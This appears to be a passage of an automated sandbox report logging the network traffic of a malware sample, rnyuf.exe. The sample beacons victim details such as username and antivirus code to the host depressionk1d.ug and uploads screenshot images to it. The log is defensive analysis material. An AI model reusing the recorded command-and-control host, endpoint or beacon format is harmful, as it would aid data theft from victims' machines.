73 20 70 72 65 74 74 79 20 73 69 6d 70 6c 65 3a 20 70 61 64 20 74 68 65 20 65 72 72 6f 72 0a 20 20 20 2d 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 61 20 62 69 67 20 63 6f 6d 6d 65 6e 74 20 6c 69 6b 65 20 74 68 69 73 20 74 6f 20 70 75 73 68 20 69 74 0a 20 20 20 2d 20 6f 76 65 72 20 74 68 65 20 66 69 76 65 20
                          Data Ascii: <HTML><HEAD><title>503 Service Temporarily Unavailable - </title><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><link rel="icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /><link rel="shortcut icon" href="/favicon5536fc9343e9ab0aca071354084dd3cc.ico" type="image/x-icon" /></HEAD><BODY><center><H1>503 Service Temporarily Unavailable<br> </H1></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to push it - over the five
                          Nov 12, 2021 22:23:53.190293074 CET7794INData Raw: 68 75 6e 64 72 65 64 20 61 6e 64 20 74 77 65 6c 76 65 20 62 79 74 65 73 20 6d 69 6e 69 6d 75 6d 2e 0a 20 20 20 2d 20 4f 66 20 63 6f 75 72 73 65 2c 20 74 68 61 74 27 73 20 65 78 61 63 74 6c 79 20 77 68 61 74 20 79 6f 75 27 72 65 20 72 65 61 64 69
                          Data Ascii: hundred and twelve bytes minimum. - Of course, that's exactly what you're reading - right now. -->
                          Nov 12, 2021 22:23:53.207425117 CET7794OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----35cdb41c8aae8e685df6a1946f054310
                          Host: depressionk1d.ug
                          Content-Length: 111710
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:53.207549095 CET7794OUTData Raw: 2d 2d 2d 2d 2d 2d 33 35 63 64 62 34 31 63 38 61 61 65 38 65 36 38 35 64 66 36 61 31 39 34 36 66 30 35 34 33 31 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------35cdb41c8aae8e685df6a1946f054310Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:53.207808018 CET7804OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:53.207988024 CET7807OUTData Raw: de fb bf f3 b8 b4 51 45 6c 64 14 51 4b 40 09 45 29 a4 a0 04 34 0a 5a 28 18 52 d2 52 d0 20 a4 a5 a3 19 a6 02 51 4b 8a 31 4a c0 25 14 b8 a4 a0 02 8a 28 a0 7a 85 14 51 40 82 8a 28 a0 02 8a 28 a0 02 8a 29 79 a0 03 9a 28 e6 8a 60 14 51 45 02 0a 28 14
                          Data Ascii: QEldQK@E)4Z(RR QK1J%(zQ@(()y(`QE(+g%DA5YJ>]j'#(i;;0nP{r8-T?>?ESb(b(OSNSN
                          Nov 12, 2021 22:23:53.230465889 CET7812OUTData Raw: 75 02 10 d2 52 e2 8a 60 25 14 b4 77 a4 02 51 4b 41 a6 00 68 a3 bd 14 00 da 9a d3 fe 3f 6d ff 00 eb aa ff 00 31 50 d4 b6 df f1 f7 07 fd 74 5f e7 59 55 f8 1f a1 d1 86 fe 3c 3d 57 e6 75 fb e8 df 55 f7 d1 be be 4f 94 fd 83 da 9d 49 d0 60 3e 1b 92 f5
                          Data Ascii: uR`%wQKAh?m1Pt_YU<=WuUOI`>oElnIYFg#qnu@[S4jsXN=%>~g{IL^5cX1ve,k?:(>p:IEjYNe|::n}ko
                          Nov 12, 2021 22:23:53.230508089 CET7818OUTData Raw: d9 3c 73 51 f5 57 fc ff 00 82 2b eb 94 3f e7 cf fe 4c cf 78 f1 8f c5 3d 0f 54 f0 ed c5 95 96 f2 64 2a 58 bb 26 70 08 38 01 49 c9 c8 15 e0 55 61 ac ae d6 49 e3 6b 49 c3 db ae f9 94 c6 73 12 e4 0c b0 c7 03 24 72 7d 45 45 24 32 c4 23 32 c4 e8 25 4d
                          Data Ascii: <sQW+?Lx=Td*X&p8IUaIkIs$r}EE$2#2%MR7Hghm1Xm9cWkHmRAE())i)QE9IK%(PII@CEV<U~CjX55I0 7oM/f:q$ v
                          Nov 12, 2021 22:23:53.230551004 CET7823OUTData Raw: 2e 0e 8d ff 00 5d ff 00 f6 53 5c ad 75 3f 0e 3f e4 a1 68 bf f5 df ff 00 65 35 35 7e 09 7a 15 4f e3 5e a7 d4 54 51 5e 6e fe 2b be 9f c4 f7 1a 35 be ad 28 bc fb 54 91 47 6e b0 27 00 31 c0 dc 53 1f 74 77 35 e7 61 f0 d5 31 0d a8 74 57 7e 87 a3 56 af
                          Data Ascii: .]S\u??he55~zO^TQ^n+5(TGn'1Stw5a1tW~VWo\i$Hci%uHe,k$nr=5i`Io?z?Zp%N*OfM,D*In4(>~0]-so6Osy&-jI9I1]B
                          Nov 12, 2021 22:23:53.230602026 CET7834OUTData Raw: c4 56 d6 31 c3 69 1e a1 13 3a af cb d1 d4 9c 0e e4 0e 49 f7 ac bf 18 3b 27 8d 35 27 46 2a cb 3e 43 03 82 0e 05 73 d6 df 18 fc 4d 66 25 16 d0 69 91 09 64 32 b8 4b 62 01 63 d4 fd ee f8 ac 0b ff 00 19 ea 7a 95 fc d7 97 11 db 79 d3 36 e7 2a 84 0c fe
                          Data Ascii: V1i:I;'5'F*>CsMf%id2Kbczy6*usOEk~G.6EF=5B8Ge<W?{xR(SIo?o$?]>eCt1r;z]cxAagK{<5ZW!XHCny_JtW
                          Nov 12, 2021 22:23:53.253192902 CET7839OUTData Raw: 3d c4 cd 2b 9c 9c f2 cc 49 35 e2 9f 1c 58 36 b1 68 01 c9 58 50 1f 6e 64 3f d6 b8 bf f8 58 9e 27 ff 00 a0 a5 d7 fe 04 49 ff 00 c5 56 3e a5 ab de 6a f2 89 6e e5 2e dd c9 24 92 7d 49 24 93 57 4f 0d 59 d4 8b 92 b2 4e fb 84 b1 18 5a 54 aa 72 4d c9 c9
                          Data Ascii: =+I5X6hXPnd?X'IV>jn.$}I$WOYNZTrMY+[RQdx"RPoi}My19x%}b?9+,md-Yb|#u<sAJ=-3Q3$~7Ft2dc#xGk?N
                          Nov 12, 2021 22:23:53.253264904 CET7850OUTData Raw: 2e 68 26 c4 a0 d3 83 54 20 d3 81 a6 2e 52 70 f4 e0 d5 5b 75 48 87 9a 64 38 96 54 d4 9b b3 55 c3 53 83 53 32 71 2c 06 a5 0d 50 ee e2 94 35 2b 10 e2 4f bb 8a 72 ca 47 43 55 cb 52 07 a5 ca 85 c8 5e 5b 97 1f c4 69 7e d2 dd f9 aa 61 e8 df 53 ec d0 b9
                          Data Ascii: .h&T .Rp[uHd8TUSS2q,P5+OrGCUR^[i~aSYwS?oSf\lcTCcNI#OTVfC)*fkR$OB~n-q|GGU!t:!+M=&R{'CGZ7L?zS&J_
                          Nov 12, 2021 22:23:53.253295898 CET7855OUTData Raw: 53 85 30 62 8a 70 a6 8a 5a 09 16 94 53 69 c2 98 85 14 e1 48 28 34 12 6b 78 7c 67 57 8b e8 6a 1b cf f8 fe 9b fd f3 56 3c 3b ce af 1f d0 d4 17 bf f1 fd 37 fb e7 f9 d7 2a 7f bf 7e 86 93 fe 0a f5 2b d1 45 15 d0 72 8b 4b 48 29 68 10 b4 a3 b5 25 14 84
                          Data Ascii: S0bpZSiH(4kx|gWjV<;7*~+ErKH)h%:A@E!Q(@,:xSiK<yX>5 xCLC\8OV}_z#N4-'XoVF1Vr7.)pi3K8)RAH(niHwjQH;SAhQ
                          Nov 12, 2021 22:23:53.304981947 CET7907INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:53 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          165192.168.2.449950178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:53.349231005 CET7907OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:53.375021935 CET7907INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:53 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          166192.168.2.449951178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:53.511847973 CET7908OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:53.537736893 CET7909INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:53 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          167192.168.2.449952178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:53.679697037 CET7909OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:53.705554008 CET7910INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:53 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          168192.168.2.449953178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:53.721901894 CET7910OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:53.722143888 CET7910OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:53.722384930 CET7920OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:53.722665071 CET7923OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:53.745378017 CET7926OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:53.745465994 CET7949OUTData Raw: 7d 09 7c 37 64 c0 4c 62 b2 31 33 74 ce dd a3 35 e6 92 6a be 26 89 ee 12 6b fd 5d 1e db fd 7a bc b2 83 17 38 f9 b2 7e 5e 48 1c f7 35 9d 75 7f 79 7d b7 ed 77 73 dc 6c ce df 3a 42 fb 73 d7 19 fa 54 41 4d 38 b4 f4 45 4a 51 b3 d3 56 6b 26 b7 0b 7d f8
                          Data Ascii: }|7dLb13t5j&k]z8~^H5uy}wsl:BsTAM8EJQVk&}~5^U_TuG`k<"Y0[djXI$cauw>Iz}kv{=20i)Om5!erlyA7qo.C[c?#\|R^Y]
                          Nov 12, 2021 22:23:53.767868042 CET7954OUTData Raw: 9a 70 aa 44 b1 f4 52 52 d5 12 38 53 81 a6 0a 75 52 25 a2 50 78 a7 e6 a2 06 9c 0d 5a 64 34 48 0d 3c 1a 88 1e 69 cb 56 99 0d 13 03 4f 06 a1 14 fc d5 a6 66 d1 26 68 06 99 9a 50 6a ae 2b 12 06 a7 87 a8 41 a7 83 4d 32 5a 25 0f ef 4f 0f 50 03 4a 0d 51
                          Data Ascii: pDRR8SuR%PxZd4H<iVOf&hPj+AM2Z%OPJQ%!ETPjpErrMS;u#<zNJy^]67N*h+IlFf!Ua9T]H4k*zp)U4aD{STQ{8VHma=8/lNt.8
                          Nov 12, 2021 22:23:53.767910957 CET7962OUTData Raw: af 69 17 b3 17 b1 9a dd 11 81 9a 90 51 b4 8a 50 33 45 ca 51 68 75 28 a4 c5 38 0a 9b 94 28 a7 52 01 4a 05 4b 2d 21 40 a7 81 4d 02 9e 2a 59 68 70 1c 57 15 f1 04 ff 00 c4 ba 3f fa ea 3f 91 ae d8 57 0f f1 04 ff 00 c4 bd 3f eb b0 fe 54 e9 ee 57 54 78
                          Data Ascii: iQP3EQhu(8(RJK-!@M*YhpW??W?TWTx-&)=y#]*t/<_{_)+4dG+u,C*}?Z1?T,g8G*eYo-5_3bMVF?og
                          Nov 12, 2021 22:23:53.768085003 CET7970OUTData Raw: d1 0a 29 c2 80 28 02 a0 d1 21 45 2e 38 a0 0a 5c 71 48 a1 cb 52 2d 30 0c 53 85 4b 2d 12 0a 95 7a 54 42 a4 02 b3 66 d1 24 a5 c7 14 d1 4e 15 0c b1 40 af 29 f8 a7 f7 ad 3d dd cf f2 af 57 1d 6b ca 3e 2a 63 cc b2 fa bf f4 ad 68 7c 44 55 e8 78 ae 68 cf
                          Data Ascii: )(!E.8\qHR-0SK-zTBf$N@)=Wk>*ch|DUxh+M@<Gy%jng#3u\ ua[Of.<^5dUWVGQS[vPo+43=4ohdy6||MbzC\CW?9+
                          Nov 12, 2021 22:23:53.768203974 CET7992OUTData Raw: 34 fe b0 fb 69 7b 7e 2f fe 1f fe 18 1e 1d 5e d7 fe bf ad 3d 4e 7e 2d 1b 55 9a c1 6f e2 d2 ef a4 b3 66 08 b7 09 6e e6 32 c4 ed 00 30 18 ce 78 c7 af 15 0c 76 37 93 cc f0 c3 69 71 24 a8 c1 1e 34 89 8b 2b 16 0a 01 00 64 12 c4 0c 7a 9c 56 ef 8a b4 dd
                          Data Ascii: 4i{~/^=N~-Uofn20xv7iq$4+dzVrMf]o4Ffr3[lqx[RSR=+]v/CIa.usFXzqU5'4/."{6FUf<x:j:h%i
                          Nov 12, 2021 22:23:53.768259048 CET7999OUTData Raw: cc 6c 0a 88 49 da 30 a1 59 fd 72 5b 3c 60 63 94 a3 bd 64 a8 41 7f 5e 9f e4 69 ed 64 6c 5f f8 92 f6 ef 41 b2 d0 ed 64 bc b4 d2 ed 92 44 6b 6f b5 b3 24 db a5 69 14 ba 80 01 23 70 19 c7 f0 e7 8e 82 6b 8f 13 79 da 6c da 50 b1 65 d2 c5 ba 25 ac 02 61
                          Data Ascii: lI0Yr[<`cdA^idl_AdDko$i#pkylPe%a&bYlqF!`W[q5<\/#'y<y8-RXl7nbqRh\j|734$*7-T"VUWZ}5^
                          Nov 12, 2021 22:23:53.815083981 CET8019INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:53 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37
                          Nov 12, 2021 22:23:53.817548990 CET8020OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:53.843214989 CET8020INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:53 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          169192.168.2.449954178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:54.026204109 CET8021OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:54.053461075 CET8021INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:54 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          17192.168.2.449798178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:18.548904896 CET2415OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 31
                          Cache-Control: no-cache
                          Data Raw: 65 30 3d 31 30 30 30 31 30 35 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39
                          Data Ascii: e0=1000105001&unit=152138533219
                          Nov 12, 2021 22:23:18.575047970 CET2415INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:18 GMT
                          Content-Type: text/html
                          Content-Length: 0
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          X-Powered-By: PHP/5.6.37


                          Session IDSource IPSource PortDestination IPDestination PortProcess
                          170192.168.2.449955178.208.83.4580C:\Users\user\AppData\Local\Temp\5c436eadc6\rnyuf.exe
                          TimestampkBytes transferredDirectionData
                          Nov 12, 2021 22:23:54.187715054 CET8022OUTPOST /k8FppT/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: depressionk1d.ug
                          Content-Length: 82
                          Cache-Control: no-cache
                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                          Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
                          Nov 12, 2021 22:23:54.214098930 CET8022INHTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 12 Nov 2021 21:23:54 GMT
                          Content-Type: text/html
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Keep-Alive: timeout=5
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/5.6.37
                          Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 6<c><d>0
                          Nov 12, 2021 22:23:54.236244917 CET8023OUTPOST /k8FppT/index.php?scr=1 HTTP/1.1
                          Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5
                          Host: depressionk1d.ug
                          Content-Length: 106671
                          Cache-Control: no-cache
                          Nov 12, 2021 22:23:54.236355066 CET8023OUTData Raw: 2d 2d 2d 2d 2d 2d 64 62 31 61 31 31 38 32 39 30 35 34 33 65 62 61 33 66 33 31 37 30 66 64 34 32 66 32 62 38 66 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                          Data Ascii: ------db1a118290543eba3f3170fd42f2b8f5Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                          Nov 12, 2021 22:23:54.236677885 CET8033OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                          Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                          Nov 12, 2021 22:23:54.236880064 CET8035OUTData Raw: c9 35 0e b5 35 bb 21 ce 2b a9 95 45 49 34 7e 54 f2 47 9c ec 62 b9 f5 c5 47 5a 27 72 82 8a 5a 28 01 28 a5 a2 80 12 96 97 14 62 80 12 8a 5a 3b d0 02 51 4b 45 31 06 28 a0 52 d1 60 12 8a 5a 50 29 88 4c 52 d1 8a 0d 00 14 51 8a 5a 00 4c 51 8a 5c 51 8a
                          Data Ascii: 55!+EI4~TGbGZ'rZ((bZ;QKE1(R`ZP)LRQZLQ\QaqR@%((4QJ)h1@KEc4SbF(\e.=iamR,.(cq.)hIv(Qv))X.'4sF(Z9ME4\PE6Z)XbQKE%Q`REJ)iCI
                          Nov 12, 2021 22:23:54.259020090 CET8041OUTData Raw: 42 41 c1 e0 f2 2b ca a9 1e 6a 95 17 9a fc 91 ee aa 9e ce 96 1e 76 4e d1 7b ff 00 8e 64 1a 07 87 e1 d2 2d 33 2a c7 2d ec 8c 64 9a 6c 64 ee 3d 81 3c e0 74 1f 9d 2d c7 85 f4 bb 99 fc c6 8a 55 46 90 48 f0 47 33 2c 4e c3 9c b2 03 82 6b 8a 3a ff 00 88
                          Data Ascii: BA+jvN{d-3*-dld=<t-UFHG3,Nk:,v\]Gw$V5g]/'7mB&f\c/gr34"NlbI?Z"0Lt?EWqQ@%PRS(J3@Q
                          Nov 12, 2021 22:23:54.259078979 CET8052OUTData Raw: e7 4f bf 96 7d 42 39 a5 2b 69 2e c9 54 40 01 62 30 14 2f 0d 97 3b b3 9c 0a e7 fc 1d a5 6a 53 2a eb 76 d6 5a 8d f4 5a 6d cc 52 25 ad 94 2d 23 4b 38 cb 26 ed a0 ed 51 b7 96 eb c8 03 ae 47 2e 61 43 da 94 c6 a7 1c 74 aa f6 52 bb 77 df fc ee 43 a9 17
                          Data Ascii: O}B9+i.T@b0/;jS*vZZmR%-#K8&QG.aCtRwCechMw+>y_o\sS5_od.+,i;xQsqRqk^_/6Gc[?rXciNr9,8bH*SqRR;4fb
                          Nov 12, 2021 22:23:54.259110928 CET8057OUTData Raw: 7d a9 0a 66 a7 90 6a a1 9e d1 54 46 2a d3 68 b3 51 18 aa 5d 33 48 d5 33 4c 75 1b 47 c5 69 34 35 13 43 58 ca 99 b4 6a 99 6f 15 40 d1 d6 a3 c5 50 3c 55 cf 3a 67 44 2a 99 a5 71 4c 2b 57 9e 2a 81 d2 b0 94 2c 74 46 77 2a 91 4d c5 4e 56 98 56 b3 71 34
                          Data Ascii: }fjTF*hQ]3H3LuGi45CXjo@P<U:gD*qL+W*,tFw*MNVVq4R#HE&*lUc~)Q`JQI\@($2iZm.+"o7;0ROfT(%(p vi)(!L\PzR8\hC@cMa(sQN,Uzm]GCd@S*t+\
